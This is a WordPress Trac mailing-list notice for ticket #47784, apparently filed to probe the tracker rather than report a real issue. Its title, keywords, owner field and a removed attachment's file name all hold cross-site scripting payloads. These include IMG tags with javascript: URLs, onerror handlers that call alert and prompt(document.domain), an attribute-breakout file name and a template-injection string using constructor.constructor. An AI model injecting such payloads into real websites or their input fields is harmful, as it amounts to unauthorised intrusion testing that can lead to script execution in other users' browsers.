[wp-trac] [WordPress Trac] #47784: <IMG SRC=jAVasCrIPt:alert(‘XSS’)> <IMG SRC=”javascript:alert(‘XSS’);”> <IMG SRC=javascript:alert("XSS")> <IMG SRC=javascript:alert(‘XSS’)> <img src=xss onerror=alert(1)>
WordPress Trac
noreply at wordpress.org
Fri Jul 26 18:22:03 UTC 2019
#47784: <IMG SRC=jAVasCrIPt:alert(‘XSS’)> <IMG SRC=”javascript:alert(‘XSS’);”> <IMG
SRC=javascript:alert("XSS")> <IMG SRC=javascript:alert(‘XSS’)>
<img src=xss onerror=alert(1)>
-------------------------------------+-------------------------------------
Reporter: harry008 | Owner:
| {{constructor.constructor('alert(document.domain)')()}}
Type: enhancement | Status: assigned
Priority: normal | Milestone: Awaiting Review
Component: General | Version: 5.2.2
Severity: normal | Resolution:
Keywords: has-patch<IMG | Focuses:
SRC=jAVasCrIPt:alert(‘XSS’)> <IMG |
SRC=”javascript:alert(‘XSS’);”> |
<IMG |
SRC=javascript:alert("XSS")>|
<IMG SRC=javascript:alert(‘XSS’)> |
<img src=xss onerror=alert(1)> |
-------------------------------------+-------------------------------------
Changes (by harry008):
* Attachment "“> <img src = x onerror = prompt (document.domain)>.jpg"
removed.
{{constructor.constructor('alert(document.domain)')()}}
--
Ticket URL: <https://core.trac.wordpress.org/ticket/47784>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
More information about the wp-trac
mailing list